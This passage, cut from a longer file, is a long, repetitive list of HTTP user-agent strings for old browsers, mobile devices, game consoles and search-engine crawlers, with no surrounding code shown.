Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 